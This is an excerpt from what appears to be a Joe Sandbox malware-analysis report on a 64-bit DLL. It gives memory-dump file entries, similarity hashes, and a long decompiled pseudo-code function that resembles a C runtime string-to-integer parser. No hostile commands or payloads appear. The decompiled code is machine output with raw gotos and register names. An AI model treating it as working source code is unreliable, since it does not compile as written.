                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D31FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 4284633421-0
                                                                                                        • Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction ID: 187339ec9b172baed9e037a8861745b3680e2ac70eb7c2858e5141c447c5a4bc
                                                                                                        • Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
                                                                                                        • Instruction Fuzzy Hash: D251E22AA1CED982DA50DB65E4413AAA3A4F7C4790F905136EBCD43B6ADF6CD411CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00007FFC7FFC123D893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				void* _v64;
                                                                                                        				intOrPtr _v68;
                                                                                                        				intOrPtr _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				intOrPtr _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				intOrPtr _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				intOrPtr _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				long long _v160;
                                                                                                        				long long _v168;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t155;
                                                                                                        				void* _t185;
                                                                                                        				signed short _t199;
                                                                                                        				signed short _t200;
                                                                                                        				signed int _t201;
                                                                                                        				signed int _t250;
                                                                                                        				signed int _t252;
                                                                                                        				signed int _t254;
                                                                                                        				signed int _t255;
                                                                                                        				signed int _t258;
                                                                                                        				signed int _t261;
                                                                                                        				signed short* _t380;
                                                                                                        				signed short* _t381;
                                                                                                        				signed short* _t382;
                                                                                                        				signed short* _t384;
                                                                                                        				signed short** _t385;
                                                                                                        				long long _t386;
                                                                                                        				long long* _t389;
                                                                                                        				signed short* _t390;
                                                                                                        				long long* _t394;
                                                                                                        				long long* _t395;
                                                                                                        				long long* _t396;
                                                                                                        				signed short** _t397;
                                                                                                        				void* _t398;
                                                                                                        				void* _t399;
                                                                                                        				signed short* _t404;
                                                                                                        				signed short* _t405;
                                                                                                        				long long _t406;
                                                                                                        				signed short* _t407;
                                                                                                        				long long _t408;
                                                                                                        				intOrPtr _t409;
                                                                                                        
                                                                                                        				_t403 = __r8;
                                                                                                        				_t394 = __rdx;
                                                                                                        				_t386 = __rbx;
                                                                                                        				_a24 = __rbx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                        				r13d = 0;
                                                                                                        				_t255 = r9b & 0xffffffff;
                                                                                                        				r14d = r8d;
                                                                                                        				_v64 = _t406;
                                                                                                        				_t397 = __rdx;
                                                                                                        				if (_t406 != 0) goto 0x123d8987;
                                                                                                        				E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				goto 0x123d89b9;
                                                                                                        				if (r14d == 0) goto 0x123d89d1;
                                                                                                        				_t4 = _t403 - 2; // -2
                                                                                                        				if (_t4 - 0x22 <= 0) goto 0x123d89d1;
                                                                                                        				_v160 = __rcx;
                                                                                                        				r9d = 0;
                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                        				_v168 = _t408;
                                                                                                        				E00007FFC7FFC123D9674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                        				_t389 = _t397[1];
                                                                                                        				if (_t389 == 0) goto 0x123d901d;
                                                                                                        				 *_t389 =  *_t397;
                                                                                                        				goto 0x123d901d;
                                                                                                        				 *_t394 = _t406 + 2;
                                                                                                        				_t260 = r13d;
                                                                                                        				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x123d89fb;
                                                                                                        				0x123d9140();
                                                                                                        				goto 0x123d89fb;
                                                                                                        				_t378 =  *_t397;
                                                                                                        				 *_t397 =  &(( *_t397)[1]);
                                                                                                        				if (E00007FFC7FFC123DB244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x123d89ee;
                                                                                                        				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                        				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x123d8a32;
                                                                                                        				_t380 =  *_t397;
                                                                                                        				_t199 =  *_t380 & 0x0000ffff;
                                                                                                        				_t381 =  &(_t380[1]);
                                                                                                        				 *_t397 = _t381;
                                                                                                        				_a16 = 0xa70;
                                                                                                        				_v152 = 0xae6;
                                                                                                        				_v148 = 0xaf0;
                                                                                                        				_v144 = 0xb66;
                                                                                                        				r8d = 0x660;
                                                                                                        				_v140 = 0xb70;
                                                                                                        				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                        				r9d = _t20;
                                                                                                        				_v136 = 0xc66;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				_v132 = 0xc70;
                                                                                                        				r11d = 0x966;
                                                                                                        				_v128 = 0xce6;
                                                                                                        				_v124 = 0xcf0;
                                                                                                        				_v120 = 0xd66;
                                                                                                        				_v116 = 0xd70;
                                                                                                        				_v112 = 0xe50;
                                                                                                        				_v108 = 0xe5a;
                                                                                                        				_v104 = 0xed0;
                                                                                                        				_v100 = 0xeda;
                                                                                                        				_v96 = 0xf20;
                                                                                                        				_v92 = 0xf2a;
                                                                                                        				_v88 = 0x1040;
                                                                                                        				_v84 = 0x104a;
                                                                                                        				_v80 = 0x17e0;
                                                                                                        				_v76 = 0x17ea;
                                                                                                        				_v72 = 0x1810;
                                                                                                        				_v68 = 0xff1a;
                                                                                                        				if ((r14d & 0xffffffef) != 0) goto 0x123d8da0;
                                                                                                        				if (_t199 - 0x30 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x3a >= 0) goto 0x123d8b3e;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - 0xff10 >= 0) goto 0x123d8cdb;
                                                                                                        				if (_t199 - r8w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x66a >= 0) goto 0x123d8b66;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r10w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x6fa >= 0) goto 0x123d8b85;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r11w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x970 >= 0) goto 0x123d8ba4;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - r9w < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - 0x9f0 >= 0) goto 0x123d8bc3;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _a16 >= 0) goto 0x123d8be3;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - _v152 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v148 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v144 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v140 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v136 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v132 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v128 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v124 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v120 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v116 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v112 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v108 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v104 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v100 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v96 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v92 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v88 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v84 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v80 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v76 < 0) goto 0x123d8b34;
                                                                                                        				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x123d8cef;
                                                                                                        				goto 0x123d8b34;
                                                                                                        				if (_t199 - _v68 >= 0) goto 0x123d8cef;
                                                                                                        				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x123d8d11;
                                                                                                        				_t64 = _t389 - 0x41; // -17
                                                                                                        				_t65 = _t389 - 0x61; // -49
                                                                                                        				_t155 = _t65;
                                                                                                        				if (_t64 - 0x19 <= 0) goto 0x123d8d06;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x123d8d91;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x123d8d0e;
                                                                                                        				_t66 = _t389 - 0x37; // -231
                                                                                                        				if (_t66 != 0) goto 0x123d8d91;
                                                                                                        				_t390 =  *_t397;
                                                                                                        				r9d = 0xffdf;
                                                                                                        				_t250 =  *_t390 & 0x0000ffff;
                                                                                                        				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                        				_t404 = _t67;
                                                                                                        				 *_t397 = _t404;
                                                                                                        				_t68 = _t394 - 0x58; // 0x698
                                                                                                        				if ((r9w & _t68) == 0) goto 0x123d8d79;
                                                                                                        				 *_t397 = _t390;
                                                                                                        				_t159 =  !=  ? r14d : 8;
                                                                                                        				r14d =  !=  ? r14d : 8;
                                                                                                        				if (_t250 == 0) goto 0x123d8d71;
                                                                                                        				if ( *_t390 == _t250) goto 0x123d8d71;
                                                                                                        				E00007FFC7FFC123DB420(_t381);
                                                                                                        				 *_t381 = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				r8d = 0x660;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				r11d = 0x966;
                                                                                                        				goto 0x123d8da0;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x123d8da0;
                                                                                                        				_t200 =  *_t404 & 0x0000ffff;
                                                                                                        				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                        				_t382 = _t71;
                                                                                                        				 *_t397 = _t382;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x123d8d96;
                                                                                                        				_t164 =  !=  ? r14d : 0xa;
                                                                                                        				r14d = 0xa;
                                                                                                        				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                        				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				r12d = 0x30;
                                                                                                        				r15d = 0xff10;
                                                                                                        				r9d = 0xa / r14d;
                                                                                                        				if (_t200 - r12w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x3a >= 0) goto 0x123d8dd2;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r15w >= 0) goto 0x123d8f5b;
                                                                                                        				if (_t200 - r8w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x66a >= 0) goto 0x123d8dfb;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r10w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x6fa >= 0) goto 0x123d8e1a;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r11w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x970 >= 0) goto 0x123d8e39;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - 0x9e6 < 0) goto 0x123d8f70;
                                                                                                        				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                        				if (_t200 - _t76 >= 0) goto 0x123d8e59;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - 0xa66 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _a16 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v152 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v148 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v144 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v140 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v136 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v132 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v128 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v124 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v120 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v116 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v112 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v108 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v104 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v100 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v96 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v92 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v88 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v84 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v80 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v76 < 0) goto 0x123d8e4f;
                                                                                                        				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x123d8f70;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - _v68 >= 0) goto 0x123d8f70;
                                                                                                        				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x123d8f93;
                                                                                                        				_t100 = _t390 - 0x41; // -65
                                                                                                        				_t101 = _t390 - 0x61; // -97
                                                                                                        				_t185 = _t101;
                                                                                                        				if (_t100 - 0x19 <= 0) goto 0x123d8f83;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x123d8f90;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x123d8f8b;
                                                                                                        				goto 0x123d8f93;
                                                                                                        				_t405 =  *_t397;
                                                                                                        				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x123d8fd7;
                                                                                                        				_t201 =  *_t405 & 0x0000ffff;
                                                                                                        				_t254 = _t382 + _t390;
                                                                                                        				_t261 = _t254;
                                                                                                        				_t107 =  &(_t405[1]); // 0x2
                                                                                                        				r8d = 0x660;
                                                                                                        				 *_t397 = _t107;
                                                                                                        				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                        				goto 0x123d8db7;
                                                                                                        				_t409 = _a8;
                                                                                                        				_t109 = _t405 - 2; // -2
                                                                                                        				_t384 = _t109;
                                                                                                        				_t407 = _v64;
                                                                                                        				 *_t397 = _t384;
                                                                                                        				if (_t201 == 0) goto 0x123d9008;
                                                                                                        				if ( *_t384 == _t201) goto 0x123d9008;
                                                                                                        				E00007FFC7FFC123DB420(_t384);
                                                                                                        				 *_t384 = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				if ((sil & 0x00000008) != 0) goto 0x123d9024;
                                                                                                        				_t385 = _t397[1];
                                                                                                        				 *_t397 = _t407;
                                                                                                        				if (_t385 == 0) goto 0x123d901d;
                                                                                                        				 *_t385 = _t407;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				r8d = 0x80000000;
                                                                                                        				_t114 = _t405 - 1; // -1
                                                                                                        				r9d = _t114;
                                                                                                        				if ((sil & 0x00000004) != 0) goto 0x123d904c;
                                                                                                        				if ((sil & 0x00000001) == 0) goto 0x123d908f;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x123d9047;
                                                                                                        				if (_t261 - r8d <= 0) goto 0x123d9095;
                                                                                                        				goto 0x123d904c;
                                                                                                        				if (_t261 - r9d <= 0) goto 0x123d9097;
                                                                                                        				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                        				if ((_t258 & 0x00000001) != 0) goto 0x123d9067;
                                                                                                        				goto 0x123d9097;
                                                                                                        				_t395 = _t397[1];
                                                                                                        				if ((_t258 & 0x00000002) == 0) goto 0x123d907f;
                                                                                                        				if (_t395 == 0) goto 0x123d907a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				if (_t395 == 0) goto 0x123d908a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x123d9097;
                                                                                                        				_t396 = _t397[1];
                                                                                                        				if (_t396 == 0) goto 0x123d90a6;
                                                                                                        				 *_t396 =  *_t397;
                                                                                                        				return  ~(_t261 | 0xffffffff);
                                                                                                        			}





























































                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d8941
                                                                                                        0x7ffc123d8958
                                                                                                        0x7ffc123d895b
                                                                                                        0x7ffc123d895e
                                                                                                        0x7ffc123d8962
                                                                                                        0x7ffc123d8965
                                                                                                        0x7ffc123d896d
                                                                                                        0x7ffc123d8973
                                                                                                        0x7ffc123d8975
                                                                                                        0x7ffc123d897a
                                                                                                        0x7ffc123d8980
                                                                                                        0x7ffc123d8985
                                                                                                        0x7ffc123d898a
                                                                                                        0x7ffc123d898c
                                                                                                        0x7ffc123d8993
                                                                                                        0x7ffc123d8995
                                                                                                        0x7ffc123d899a
                                                                                                        0x7ffc123d899d
                                                                                                        0x7ffc123d89a1
                                                                                                        0x7ffc123d89a4
                                                                                                        0x7ffc123d89af
                                                                                                        0x7ffc123d89b4
                                                                                                        0x7ffc123d89b9
                                                                                                        0x7ffc123d89c0
                                                                                                        0x7ffc123d89c9
                                                                                                        0x7ffc123d89cc
                                                                                                        0x7ffc123d89db
                                                                                                        0x7ffc123d89de
                                                                                                        0x7ffc123d89e5
                                                                                                        0x7ffc123d89e7
                                                                                                        0x7ffc123d89ec
                                                                                                        0x7ffc123d89ee
                                                                                                        0x7ffc123d89f8
                                                                                                        0x7ffc123d8a0a
                                                                                                        0x7ffc123d8a1a
                                                                                                        0x7ffc123d8a23
                                                                                                        0x7ffc123d8a25
                                                                                                        0x7ffc123d8a28
                                                                                                        0x7ffc123d8a2b
                                                                                                        0x7ffc123d8a2f
                                                                                                        0x7ffc123d8a32
                                                                                                        0x7ffc123d8a42
                                                                                                        0x7ffc123d8a4f
                                                                                                        0x7ffc123d8a5c
                                                                                                        0x7ffc123d8a64
                                                                                                        0x7ffc123d8a6a
                                                                                                        0x7ffc123d8a72
                                                                                                        0x7ffc123d8a72
                                                                                                        0x7ffc123d8a76
                                                                                                        0x7ffc123d8a7e
                                                                                                        0x7ffc123d8a84
                                                                                                        0x7ffc123d8a8c
                                                                                                        0x7ffc123d8a92
                                                                                                        0x7ffc123d8a9a
                                                                                                        0x7ffc123d8aa2
                                                                                                        0x7ffc123d8aaa
                                                                                                        0x7ffc123d8ab2
                                                                                                        0x7ffc123d8aba
                                                                                                        0x7ffc123d8ac2
                                                                                                        0x7ffc123d8aca
                                                                                                        0x7ffc123d8ad2
                                                                                                        0x7ffc123d8ada
                                                                                                        0x7ffc123d8ae2
                                                                                                        0x7ffc123d8aea
                                                                                                        0x7ffc123d8af2
                                                                                                        0x7ffc123d8afa
                                                                                                        0x7ffc123d8b02
                                                                                                        0x7ffc123d8b0d
                                                                                                        0x7ffc123d8b1f
                                                                                                        0x7ffc123d8b28
                                                                                                        0x7ffc123d8b32
                                                                                                        0x7ffc123d8b39
                                                                                                        0x7ffc123d8b41
                                                                                                        0x7ffc123d8b4b
                                                                                                        0x7ffc123d8b59
                                                                                                        0x7ffc123d8b61
                                                                                                        0x7ffc123d8b6a
                                                                                                        0x7ffc123d8b78
                                                                                                        0x7ffc123d8b80
                                                                                                        0x7ffc123d8b89
                                                                                                        0x7ffc123d8b97
                                                                                                        0x7ffc123d8b9f
                                                                                                        0x7ffc123d8ba8
                                                                                                        0x7ffc123d8bb6
                                                                                                        0x7ffc123d8bbe
                                                                                                        0x7ffc123d8bc6
                                                                                                        0x7ffc123d8bd4
                                                                                                        0x7ffc123d8bde
                                                                                                        0x7ffc123d8bea
                                                                                                        0x7ffc123d8bf5
                                                                                                        0x7ffc123d8c02
                                                                                                        0x7ffc123d8c0d
                                                                                                        0x7ffc123d8c1a
                                                                                                        0x7ffc123d8c25
                                                                                                        0x7ffc123d8c32
                                                                                                        0x7ffc123d8c3d
                                                                                                        0x7ffc123d8c4a
                                                                                                        0x7ffc123d8c55
                                                                                                        0x7ffc123d8c62
                                                                                                        0x7ffc123d8c6d
                                                                                                        0x7ffc123d8c7a
                                                                                                        0x7ffc123d8c81
                                                                                                        0x7ffc123d8c8e
                                                                                                        0x7ffc123d8c95
                                                                                                        0x7ffc123d8ca2
                                                                                                        0x7ffc123d8ca9
                                                                                                        0x7ffc123d8cb6
                                                                                                        0x7ffc123d8cbd
                                                                                                        0x7ffc123d8cd4
                                                                                                        0x7ffc123d8cd6
                                                                                                        0x7ffc123d8ce3
                                                                                                        0x7ffc123d8ced
                                                                                                        0x7ffc123d8cf2
                                                                                                        0x7ffc123d8cf8
                                                                                                        0x7ffc123d8cf8
                                                                                                        0x7ffc123d8cfb
                                                                                                        0x7ffc123d8d00
                                                                                                        0x7ffc123d8d09
                                                                                                        0x7ffc123d8d0e
                                                                                                        0x7ffc123d8d13
                                                                                                        0x7ffc123d8d15
                                                                                                        0x7ffc123d8d18
                                                                                                        0x7ffc123d8d1e
                                                                                                        0x7ffc123d8d21
                                                                                                        0x7ffc123d8d21
                                                                                                        0x7ffc123d8d25
                                                                                                        0x7ffc123d8d28
                                                                                                        0x7ffc123d8d2f
                                                                                                        0x7ffc123d8d34
                                                                                                        0x7ffc123d8d3c
                                                                                                        0x7ffc123d8d40
                                                                                                        0x7ffc123d8d46
                                                                                                        0x7ffc123d8d4b
                                                                                                        0x7ffc123d8d4d
                                                                                                        0x7ffc123d8d52
                                                                                                        0x7ffc123d8d58
                                                                                                        0x7ffc123d8d5d
                                                                                                        0x7ffc123d8d63
                                                                                                        0x7ffc123d8d69
                                                                                                        0x7ffc123d8d6f
                                                                                                        0x7ffc123d8d71
                                                                                                        0x7ffc123d8d77
                                                                                                        0x7ffc123d8d79
                                                                                                        0x7ffc123d8d7d
                                                                                                        0x7ffc123d8d7d
                                                                                                        0x7ffc123d8d81
                                                                                                        0x7ffc123d8d84
                                                                                                        0x7ffc123d8d8f
                                                                                                        0x7ffc123d8d99
                                                                                                        0x7ffc123d8d9d
                                                                                                        0x7ffc123d8da2
                                                                                                        0x7ffc123d8da5
                                                                                                        0x7ffc123d8da5
                                                                                                        0x7ffc123d8da8
                                                                                                        0x7ffc123d8dae
                                                                                                        0x7ffc123d8db4
                                                                                                        0x7ffc123d8dbb
                                                                                                        0x7ffc123d8dc5
                                                                                                        0x7ffc123d8dcd
                                                                                                        0x7ffc123d8dd6
                                                                                                        0x7ffc123d8de0
                                                                                                        0x7ffc123d8dee
                                                                                                        0x7ffc123d8df6
                                                                                                        0x7ffc123d8dff
                                                                                                        0x7ffc123d8e0d
                                                                                                        0x7ffc123d8e15
                                                                                                        0x7ffc123d8e1e
                                                                                                        0x7ffc123d8e2c
                                                                                                        0x7ffc123d8e34
                                                                                                        0x7ffc123d8e41
                                                                                                        0x7ffc123d8e47
                                                                                                        0x7ffc123d8e4d
                                                                                                        0x7ffc123d8e54
                                                                                                        0x7ffc123d8e61
                                                                                                        0x7ffc123d8e6f
                                                                                                        0x7ffc123d8e78
                                                                                                        0x7ffc123d8e83
                                                                                                        0x7ffc123d8e8c
                                                                                                        0x7ffc123d8e97
                                                                                                        0x7ffc123d8ea0
                                                                                                        0x7ffc123d8eab
                                                                                                        0x7ffc123d8eb4
                                                                                                        0x7ffc123d8ebf
                                                                                                        0x7ffc123d8ec8
                                                                                                        0x7ffc123d8ed3
                                                                                                        0x7ffc123d8ee0
                                                                                                        0x7ffc123d8eeb
                                                                                                        0x7ffc123d8ef8
                                                                                                        0x7ffc123d8eff
                                                                                                        0x7ffc123d8f0c
                                                                                                        0x7ffc123d8f13
                                                                                                        0x7ffc123d8f20
                                                                                                        0x7ffc123d8f27
                                                                                                        0x7ffc123d8f34
                                                                                                        0x7ffc123d8f3b
                                                                                                        0x7ffc123d8f52
                                                                                                        0x7ffc123d8f59
                                                                                                        0x7ffc123d8f63
                                                                                                        0x7ffc123d8f6e
                                                                                                        0x7ffc123d8f73
                                                                                                        0x7ffc123d8f79
                                                                                                        0x7ffc123d8f79
                                                                                                        0x7ffc123d8f7c
                                                                                                        0x7ffc123d8f81
                                                                                                        0x7ffc123d8f86
                                                                                                        0x7ffc123d8f8e
                                                                                                        0x7ffc123d8f93
                                                                                                        0x7ffc123d8f99
                                                                                                        0x7ffc123d8f9b
                                                                                                        0x7ffc123d8fa5
                                                                                                        0x7ffc123d8fb6
                                                                                                        0x7ffc123d8fbd
                                                                                                        0x7ffc123d8fc4
                                                                                                        0x7ffc123d8fcd
                                                                                                        0x7ffc123d8fd0
                                                                                                        0x7ffc123d8fd2
                                                                                                        0x7ffc123d8fd7
                                                                                                        0x7ffc123d8fdf
                                                                                                        0x7ffc123d8fdf
                                                                                                        0x7ffc123d8fe3
                                                                                                        0x7ffc123d8feb
                                                                                                        0x7ffc123d8ff1
                                                                                                        0x7ffc123d8ff6
                                                                                                        0x7ffc123d8ff8
                                                                                                        0x7ffc123d8ffd
                                                                                                        0x7ffc123d9003
                                                                                                        0x7ffc123d900c
                                                                                                        0x7ffc123d900e
                                                                                                        0x7ffc123d9012
                                                                                                        0x7ffc123d9018
                                                                                                        0x7ffc123d901a
                                                                                                        0x7ffc123d901f
                                                                                                        0x7ffc123d9024
                                                                                                        0x7ffc123d902a
                                                                                                        0x7ffc123d902a
                                                                                                        0x7ffc123d9032
                                                                                                        0x7ffc123d9038
                                                                                                        0x7ffc123d903e
                                                                                                        0x7ffc123d9043
                                                                                                        0x7ffc123d9045
                                                                                                        0x7ffc123d904a
                                                                                                        0x7ffc123d904e
                                                                                                        0x7ffc123d9056
                                                                                                        0x7ffc123d9060
                                                                                                        0x7ffc123d9065
                                                                                                        0x7ffc123d9067
                                                                                                        0x7ffc123d906d
                                                                                                        0x7ffc123d9072
                                                                                                        0x7ffc123d9077
                                                                                                        0x7ffc123d907d
                                                                                                        0x7ffc123d9082
                                                                                                        0x7ffc123d9087
                                                                                                        0x7ffc123d908d
                                                                                                        0x7ffc123d9093
                                                                                                        0x7ffc123d9097
                                                                                                        0x7ffc123d909e
                                                                                                        0x7ffc123d90a3
                                                                                                        0x7ffc123d90c2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
